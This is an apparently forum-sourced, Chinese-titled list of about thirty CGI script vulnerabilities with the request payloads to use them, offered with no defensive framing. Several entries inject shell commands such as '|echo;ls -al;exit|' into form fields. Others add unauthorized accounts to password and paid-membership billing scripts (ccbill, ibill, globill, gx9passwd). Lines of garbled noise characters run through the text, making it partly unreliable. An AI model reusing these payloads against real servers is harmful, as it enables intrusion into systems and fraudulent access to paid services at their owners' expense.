Cgi-bin 30个漏洞＋使用方法

admin

==============================

/smspass.pl
username=username&password=password
7 T2 V) x% d" Q
/index.cgi
' V' k! V* j& W- jwei=ren&gen=command

/passmaster.cgi
Action=Add&Username=Username&Password=Password
- R* k6 p4 L! o8 h
9 C! o, R  M# g/ [2 k/accountcreate.cgi
$ i8 N5 t* t7 j' l  {username=username&password=password&ref1=|echo;ls|

/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
3 l! E) f; G# q! z# \# \; p
/addusr.pl
3 F, p5 K- j$ l/cgi-bin/EuroDebit/addusr.pl
; v0 z+ b7 T! e8 h1 ^' W! U; v% }1 Suser=username&pass=Password&confirm=Password

0 u- L# C! z( @! h8 {2 M% e9 X! P/ccbill-local.asp
post_values=username:password
& C$ H2 z$ k/ W
  `+ s% ^7 d, o7 K/count.cgi
  L( m; Z: y, l7 m! L2 z8 s. q4 tpinfile=|echo;ls -la;exit|
/ c& P; ^5 p  d+ t1 F
* G% o/ R* F- X# S2 r8 H( ?/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
' |- J; P/ u- H6 ~, g* Z4 K
% |8 \* l; i, u9 x0 l$ i/verotelrum.pl
9 e: A9 D2 m- N1 gvercode=username:password:dseegsow:add:amount<&30>
' n. f5 d$ ^2 o7 l% J* a
$ I7 j+ o3 C+ }% S4 C/af.cgi
+ F2 ^% v1 @& B6 [3 [_browser_out=|echo;ls -la;exit;|

$ c% ^1 r6 Z6 e; L/modify.cgi
username=username&password=password&expire=30

/openjournal.cgi
! Y: p% ?) A0 Y7 X& \edit=1&ct=2&go=|echo;ls -al;exit|

! Y4 g! i; F6 g8 W' b4 U+ j% O/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/probecontrol.cgi
command=enable&username=username&password=password
1 Z1 ~6 p2 k9 t2 _4 C. E
/recon.cgi
; X* A! ~0 e" K7 wsearchoption=3&searchfor=echo;ls -la;exit

/htadd.pl
( A$ g4 q" N- v* Y4 Cconfigfile=|echo; ls -alt; exit

/gx9passwd.cgi
cmd=ADD&user=username&pass=password
$ \/ L3 w; D( M* a
+ E  j7 ?' }" w5 L# j' ^+ B5 g/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password

& M% q1 q6 ~- @0 ^# `/cpay.cgi
, j* `( _" T7 ^* J# mcommand=add_member&username=username(EMAIL)&password=password(DES)
4 w; `( X" ?2 S$ y: _6 c" p  e6 K
/globill_ut.cgi
# }& M; J( D- p8 C% Pdo=add&username=username&password=password&wpassword=password

& \# j! _3 x( x2 h5 C5 [" C4 Z7 t/usercontrol.cgi
command=enable&username=USER&password=PASS
, z* n* E/ E3 B. }
/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

( F" I6 s! P9 A  P+ o/addusr.pl
user=USER&pass=PASS&confirm=PASS
; e- B9 }2 [+ T$ W+ P: ~* ~; I3 f
* U0 X; i% b6 `: L/pincount.cgi
, L5 P; d1 E$ F5 B, x8 y8 T* N/cgi-bin/mastergate/pincount.cgi
! R4 B; H. a* Tpinfile=|echo;pwd;exit|

1 @; ?( s% \* i( Z* K/accountcreate.cgi
. a; G* n- w: m/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
* }4 M! K- i' o4 ]
/af.cgi
/env.cgi
) p/ V& p; P' k8 E4 M7 T! Q! _ADD+;echo;pwd;exit
8 ^5 w/ ^- w' }- k4 N3 e
1 u$ Y& Q6 g9 A/ A/count.cgi
. P% ]% w" m" V" |  J; C. J( Vpinfile=|echo;pwd;exit|
4 S. }! m0 C( n& r8 E7 M) ?- H& j
' P) M6 T. n8 J+ W- _/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

2 w* @* |4 a% C0 g0 H0 o- d/add.cgi
username=username&password=password&expire=30

==============================
$ a/ I6 f# p3 k& P9 ]0 C$ I8 t" M